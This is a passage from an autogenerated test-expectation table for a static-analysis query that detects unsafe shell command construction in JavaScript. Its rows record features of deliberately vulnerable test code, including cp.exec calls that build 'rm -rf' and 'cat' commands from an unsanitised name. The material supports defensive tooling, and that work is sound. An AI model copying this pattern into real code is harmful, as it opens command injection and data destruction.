name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:16:64:27 | stringConcat | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:16:64:27 | stringConcat | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | this | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | this | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:64:30 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | 'arguments' object of anonymous function | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | exceptional return of anonymous function | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | functio ... . \\n} | assignedToPropName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | functio ... . \\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | functio ... . \\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | functio ... . \\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | return of anonymous function | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:31:80:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:64:41:64:44 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:3 | cp | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:3 | cp | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:8 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:8 | cp.exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:2:65:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:5:65:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:5:65:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:5:65:8 | exec | enclosingFunctionBody | name cp exec rm -rf name cp exec name cp exec for foo in ( name ) do bla end cp exec cat /foO/BAR/ name cp exec cat " name " cp exec cat ' name ' cp exec cat '/foo/bar name ' cp exec name some file | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:5:65:8 | exec | enclosingFunctionName | stringConcat | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:5:65:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:65:10:65:18 | "rm -rf " | 